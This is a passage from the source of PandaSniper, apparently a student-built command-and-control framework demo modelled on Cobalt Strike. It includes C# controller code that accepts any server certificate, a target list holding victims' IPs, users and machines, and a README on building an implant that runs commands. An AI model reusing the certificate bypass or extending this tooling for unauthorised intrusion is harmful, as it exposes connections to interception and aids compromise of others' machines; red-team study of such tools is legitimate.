this.machineName = machineName; 30 | this.machinePort = machinePort; 31 | this.serverName = serverName; 32 | } 33 | // The following method is invoked by the RemoteCertificateValidationDelegate. 34 | public static bool ValidateServerCertificate( 35 | object sender, 36 | X509Certificate certificate, 37 | X509Chain chain, 38 | SslPolicyErrors sslPolicyErrors) 39 | { 40 | if (sslPolicyErrors == SslPolicyErrors.None) 41 | return true; 42 | 43 | // Console.WriteLine("Certificate error: {0}", sslPolicyErrors); 44 | 45 | // Do not allow this client to communicate with unauthenticated servers. 46 | //忽略证书验证 47 | return true; 48 | } 49 | public void StartSslTcp() 50 | { 51 | // Create a TCP/IP client socket. 52 | // machineName is the host running the server application. 53 | try 54 | { 55 | this.tcpClient = new TcpClient(this.machineName, this.machinePort); 56 | //Console.WriteLine("Client connected."); 57 | // Create an SSL stream that will close the client's stream. 58 | this.sslStream = new SslStream( 59 | this.tcpClient.GetStream(), 60 | false, 61 | new RemoteCertificateValidationCallback(ValidateServerCertificate), 62 | null 63 | ); 64 | this.sslStream.ReadTimeout = 5000; 65 | this.sslStream.WriteTimeout = 5000; 66 | // The server name must match the name on the server certificate. 67 | try 68 | { 69 | this.sslStream.AuthenticateAsClient(serverName); 70 | } 71 | catch (AuthenticationException e) 72 | { 73 | Console.WriteLine("Exception: {0}", e.Message); 74 | if (e.InnerException != null) 75 | { 76 | Console.WriteLine("Inner exception: {0}", e.InnerException.Message); 77 | } 78 | Console.WriteLine("Authentication failed - closing the connection."); 79 | this.tcpClient.Close(); 80 | } 81 | } 82 | catch (SocketException ex) 83 | { 84 | Console.WriteLine(ex.Message); 85 | } 86 | } 87 | 88 | 89 | public SslStream SendMessage(string message) 90 | { 91 | // Encode a test message into a byte array. 92 | // Signal the end of the message using the "". 93 | byte[] byte_message = Encoding.UTF8.GetBytes(message); 94 | // Send hello message to the server. 95 | if(this.sslStream == null) 96 | { 97 | this.resultMessage = "{\"code\":\"504\"}"; 98 | } 99 | else 100 | { 101 | this.sslStream.Write(byte_message); 102 | this.sslStream.Flush(); 103 | // Read message from the server. 104 | //this.ReadMessage(this.sslStream); 105 | //Console.WriteLine("Server says: {0}", serverMessage); 106 | } 107 | return this.sslStream; 108 | 109 | 110 | } 111 | //static StringBuilder readData = new StringBuilder(); 112 | //static byte[] buffer = new byte[2048]; 113 | 114 | public void ReadMessage(SslStream sslStream) 115 | { 116 | // Read the message sent by the server. 117 | // The end of the message is signaled using the 118 | // "" marker. 119 | StringBuilder messageData = new StringBuilder(); 120 | if (sslStream == null) 121 | { 122 | this.resultMessage = "{\"code\":\"504\"}"; 123 | } 124 | else 125 | { 126 | try 127 | { 128 | int bytes; 129 | do 130 | { 131 | byte[] buffer = new byte[2048]; 132 | bytes = sslStream.Read(buffer, 0, buffer.Length); 133 | // Use Decoder class to convert from bytes to UTF8 134 | // in case a character spans two buffers. 135 | Decoder decoder = Encoding.UTF8.GetDecoder(); 136 | char[] chars = new char[decoder.GetCharCount(buffer, 0, bytes)]; 137 | decoder.GetChars(buffer, 0, bytes, chars, 0); 138 | messageData.Append(chars); 139 | if(messageData.ToString().IndexOf("") != -1) 140 | { 141 | break; 142 | } 143 | 144 | } while (true); 145 | string SmessageData = messageData.ToString(); 146 | this.resultMessage = SmessageData.Substring(0, SmessageData.Length - 5); 147 | } 148 | catch (SocketException ex) 149 | { 150 | this.resultMessage = "{{\"code\":\"504\"},{\"error\":\"" + ex.Message + "\"}}"; 151 | } 152 | 153 | } 154 | 155 | } 156 | 157 | public void CloseSslTcp() 158 | { 159 | // Close the client connection. 160 | this.sslStream.Close(); 161 | this.tcpClient.Close(); 162 | } 163 | /* 164 | private static void DisplayUsage() 165 | { 166 | Console.WriteLine("To start the client specify:"); 167 | Console.WriteLine("clientSync machineName [serverName]"); 168 | Environment.Exit(1); 169 | } 170 | public static int Main(string[] args) 171 | { 172 | string serverCertificateName = null; 173 | string machineName = null; 174 | if (args == null || args.Length < 1) 175 | { 176 | DisplayUsage(); 177 | } 178 | // User can specify the machine name and server name. 179 | // Server name must match the name on the server's certificate. 180 | machineName = args[0]; 181 | if (args.Length < 2) 182 | { 183 | serverCertificateName = machineName; 184 | } 185 | else 186 | { 187 | serverCertificateName = args[1]; 188 | } 189 | SslTcpClient.RunClient(machineName, serverCertificateName); 190 | return 0; 191 | } 192 | */ 193 | } 194 | } 195 | -------------------------------------------------------------------------------- /Master/PandaSniper/TargetListView.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Collections.Generic; 3 | using System.Collections.ObjectModel; 4 | using System.Collections.Specialized; 5 | using System.ComponentModel; 6 | using System.Linq; 7 | using System.Text; 8 | using System.Threading; 9 | using System.Threading.Tasks; 10 | 11 | namespace PandaSniper 12 | { 13 | public class TargetListView : INotifyPropertyChanged 14 | { 15 | public string uid; 16 | public string time; 17 | public string country; 18 | public string externalIP; 19 | public string internalIP; 20 | public string pid; 21 | public string user; 22 | public string computer; 23 | public string arch; 24 | public string last; 25 | public event PropertyChangedEventHandler PropertyChanged; 26 | 27 | public string Country 28 | { 29 | get 30 | { 31 | return country; 32 | } 33 | set 34 | { 35 | country = value; 36 | if (this.PropertyChanged != null) 37 | { 38 | this.PropertyChanged.Invoke(this, new PropertyChangedEventArgs("Country")); 39 | } 40 | } 41 | } 42 | public string ExternalIP 43 | { 44 | get 45 | { 46 | return externalIP; 47 | } 48 | set 49 | { 50 | externalIP = value; 51 | if (this.PropertyChanged != null) 52 | { 53 | this.PropertyChanged.Invoke(this, new PropertyChangedEventArgs("ExternalIP")); 54 | } 55 | } 56 | } 57 | public string InternalIP 58 | { 59 | get 60 | { 61 | return internalIP; 62 | } 63 | set 64 | { 65 | internalIP = value; 66 | if (this.PropertyChanged != null) 67 | { 68 | this.PropertyChanged.Invoke(this, new PropertyChangedEventArgs("InternalIP")); 69 | } 70 | } 71 | } 72 | public string Pid 73 | { 74 | get 75 | { 76 | return pid; 77 | } 78 | set 79 | { 80 | pid = value; 81 | if (this.PropertyChanged != null) 82 | { 83 | this.PropertyChanged.Invoke(this, new PropertyChangedEventArgs("Pid")); 84 | } 85 | } 86 | } 87 | public string User 88 | { 89 | get 90 | { 91 | return user; 92 | } 93 | set 94 | { 95 | user = value; 96 | if (this.PropertyChanged != null) 97 | { 98 | this.PropertyChanged.Invoke(this, new PropertyChangedEventArgs("User")); 99 | } 100 | } 101 | } 102 | public string Computer 103 | { 104 | get 105 | { 106 | return computer; 107 | } 108 | set 109 | { 110 | computer = value; 111 | if (this.PropertyChanged != null) 112 | { 113 | this.PropertyChanged.Invoke(this, new PropertyChangedEventArgs("Computer")); 114 | } 115 | } 116 | } 117 | public string Arch 118 | { 119 | get 120 | { 121 | return arch; 122 | } 123 | set 124 | { 125 | arch = value; 126 | if (this.PropertyChanged != null) 127 | { 128 | this.PropertyChanged.Invoke(this, new PropertyChangedEventArgs("Arch")); 129 | } 130 | } 131 | } 132 | public string Last 133 | { 134 | get 135 | { 136 | return last; 137 | } 138 | set 139 | { 140 | last = value; 141 | if (this.PropertyChanged != null) 142 | { 143 | this.PropertyChanged.Invoke(this, new PropertyChangedEventArgs("Last")); 144 | } 145 | } 146 | } 147 | 148 | public TargetListView() { } 149 | public TargetListView( 150 | string country, 151 | string externalIP, 152 | string internalIP, 153 | string pid, 154 | string user, 155 | string computer, 156 | string arch, 157 | string last) 158 | { 159 | this.country = country; 160 | this.externalIP = externalIP; 161 | this.internalIP = internalIP; 162 | this.pid = pid; 163 | this.user = user; 164 | this.computer = computer; 165 | this.arch = arch; 166 | this.last = last; 167 | } 168 | } 169 | 170 | public class AsyncObservableCollection : ObservableCollection 171 | { 172 | //获取当前线程的SynchronizationContext对象 173 | private SynchronizationContext _synchronizationContext = SynchronizationContext.Current; 174 | public AsyncObservableCollection() { } 175 | public AsyncObservableCollection(IEnumerable list) : base(list) { } 176 | protected override void OnCollectionChanged(NotifyCollectionChangedEventArgs e) 177 | { 178 | 179 | if (SynchronizationContext.Current == _synchronizationContext) 180 | { 181 | //如果操作发生在同一个线程中,不需要进行跨线程执行 182 | RaiseCollectionChanged(e); 183 | } 184 | else 185 | { 186 | //如果不是发生在同一个线程中 187 | //准确说来,这里是在一个非UI线程中,需要进行UI的更新所进行的操作 188 | _synchronizationContext.Post(RaiseCollectionChanged, e); 189 | } 190 | } 191 | private void RaiseCollectionChanged(object param) 192 | { 193 | // 执行 194 | base.OnCollectionChanged((NotifyCollectionChangedEventArgs)param); 195 | } 196 | protected override void OnPropertyChanged(PropertyChangedEventArgs e) 197 | { 198 | if (SynchronizationContext.Current == _synchronizationContext) 199 | { 200 | // Execute the PropertyChanged event on the current thread 201 | RaisePropertyChanged(e); 202 | } 203 | else 204 | { 205 | // Post the PropertyChanged event on the creator thread 206 | _synchronizationContext.Post(RaisePropertyChanged, e); 207 | } 208 | } 209 | private void RaisePropertyChanged(object param) 210 | { 211 | // We are in the creator thread, call the base implementation directly 212 | base.OnPropertyChanged((PropertyChangedEventArgs)param); 213 | } 214 | } 215 | 216 | public class EventsContent : INotifyPropertyChanged 217 | { 218 | public string content; 219 | public event PropertyChangedEventHandler PropertyChanged; 220 | public string Content 221 | { 222 | get 223 | { 224 | return content; 225 | } 226 | set 227 | { 228 | content = value; 229 | if (this.PropertyChanged != null) 230 | { 231 | this.PropertyChanged.Invoke(this, new PropertyChangedEventArgs("Content")); 232 | } 233 | } 234 | } 235 | } 236 | 237 | 238 | } 239 | -------------------------------------------------------------------------------- /Master/PandaSniper/WebDriveBy.xaml: -------------------------------------------------------------------------------- 1 |  10 | 11 | 12 | 13 | 14 | 15 | -------------------------------------------------------------------------------- /Master/PandaSniper/WebDriveBy.xaml.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Collections.Generic; 3 | using System.Linq; 4 | using System.Text; 5 | using System.Threading.Tasks; 6 | using System.Windows; 7 | using System.Windows.Controls; 8 | using System.Windows.Data; 9 | using System.Windows.Documents; 10 | using System.Windows.Input; 11 | using System.Windows.Media; 12 | using System.Windows.Media.Imaging; 13 | using System.Windows.Navigation; 14 | using System.Windows.Shapes; 15 | 16 | namespace PandaSniper 17 | { 18 | /// 19 | /// WebDriveBy.xaml 的交互逻辑 20 | /// 21 | public partial class WebDriveBy : Page 22 | { 23 | public WebDriveBy() 24 | { 25 | InitializeComponent(); 26 | } 27 | } 28 | } 29 | -------------------------------------------------------------------------------- /Master/PandaSniper/l.ico: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/QAX-A-Team/PandaSniper/6e838a68bfcece23772b696ea811fa33096c2366/Master/PandaSniper/l.ico -------------------------------------------------------------------------------- /Master/PandaSniper/l.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/QAX-A-Team/PandaSniper/6e838a68bfcece23772b696ea811fa33096c2366/Master/PandaSniper/l.png -------------------------------------------------------------------------------- /Master/PandaSniper/packages.config: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | 6 | 7 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # PandaSniper 2 | Linux C2 框架demo,为期2周的”黑客编程马拉松“,从学习编程语言开始到实现一个demo的产物。 3 | 4 | 特别注意:此程序仅仅是demo,请勿用于实际项目。 5 | 6 | 但是我们会不定时更新,随着我们对这次新学的编程语言的更深入了解和运用,我们会不断更新和优化代码以及架构,让PandaSniper随着我们一起成长,作为我们小组技术提升的体现。 7 | 8 | 为什么叫”PandaSniper“,没有为什么,觉得熊猫狙击手比较好听,就选它了。 9 | 10 | # 起因 11 | 12 | 我相信每一个入行(信息安全)的人都有一个木马梦,向往有一天能够骑着自己的”马儿“浪迹天涯。从红狼、上兴、大灰狼到现在的MSF、Cobaltstrike等,”马儿“的名字在不停的变化,功能在不停的优化,架构在不停的更新,异或有些”马儿“慢慢消失在了信息安全这个小行业的历史长河里,但是它永远是”搞站“(渗透测试、红队评估等等)活动中的不可或缺的一大利器。 13 | 14 | 作为安全圈一名入行十余年的老鸟和带领的几个入行几年的新鸟,但都是编码圈的菜鸟的我们,一起达成了一个共识,我们要实现我们的“木马梦”,虽然我们2周前还不会写GO、C#、C/C++。我们不做”如果有这么一款马儿就好了的“美梦,我们自己上,成不成看天意,做不做看自己。 15 | 16 | # 架构简述 17 | 18 | PandaSniper使用不同编程语言,编写3个独立的组件,分为Master、Agent、Implant这3个部分。 19 | 20 | - Master(主控端):使用C#和WPF编写,作为主要功能的展示和操作部分。 21 | 22 | - Agent(代理端):使用GO编写,顾名思义作为Master端的代理人,接收和发出Master的各种指令以及数据。 23 | 24 | - Implant(植入端):使用c/c++编写,用于目标主机数据获取的植入程序,并发送数据到Agent端。 25 | 26 | 27 | 28 | 数据流和协议: 29 | 30 | ​ Master <----(tcp/ssl)-----> Agent <----(http)----> Implant 31 | 32 | 33 | 34 | 如果你打开我们的Master界面会发现,极其像Cobaltstrike。我们整个架构和界面都是模仿的Cobaltstrike,Cobaltstrike是我目前用过的最好用的和扩展性最好的以及最稳定的C2工具。我也希望我们的PandaSniper能像Cobaltstrike一样好用,但目前相差太远(及其遥远),但我们相信未来。 35 | 36 | # 功能 37 | 38 | 目前只有一个可能还存在bug的命令执行功能。对一些需要交互式的命令基本没有支持,功能还需大力完善。 39 | 40 | # 依赖 41 | 42 | - Master:.NET Framework 4.6 (Visual Studio 2019) 43 | - Agent: 无 44 | - Implant:libcurl4 45 | 46 | #### 编译和安装: 47 | 48 | - Master端使用了MaterialDesignColors和MaterialDesignThemes.Wpf(项目网址:http://materialdesigninxaml.net/),Newtonsoft.Json项目。使用Visual Studio 2019直接编译。 49 | 50 | - Agent端依赖包 51 | - github.com/bitly/go-simplejson 52 | - github.com/dgrijalva/jwt-go 53 | - github.com/urfave/cli 54 | - Implant端 55 | - 安装依赖:apt-get install libcurl4-gnutls-dev 56 | - 编译:gcc main.cpp -lcurl -lstdc++ -lpthread 57 | 58 | # TODO 59 | 60 | - Master端 61 | - 自己编写控件模板和样式,去掉MaterialDesign相关依赖 62 | - 更换Json使用库,去掉Newtonsoft.Json依赖 63 | - 利用MVVM设计模式编写界面 64 | - 整理C#代码 65 | - 完整移植Cobalstrike v4.0所有相关操作界面 66 | - Agent端 67 | - 整理规划代码 68 | - 完善架构功能和数据结构 69 | - 完善命令功能 70 | - Implant端 71 | - 整理规划代码 72 | - 去掉curllib4库的依赖,使用原生函数 73 | - 完善命令执行功能 74 | 75 | # 截图 76 | 77 | ![](1.png) 78 | --------------------------------------------------------------------------------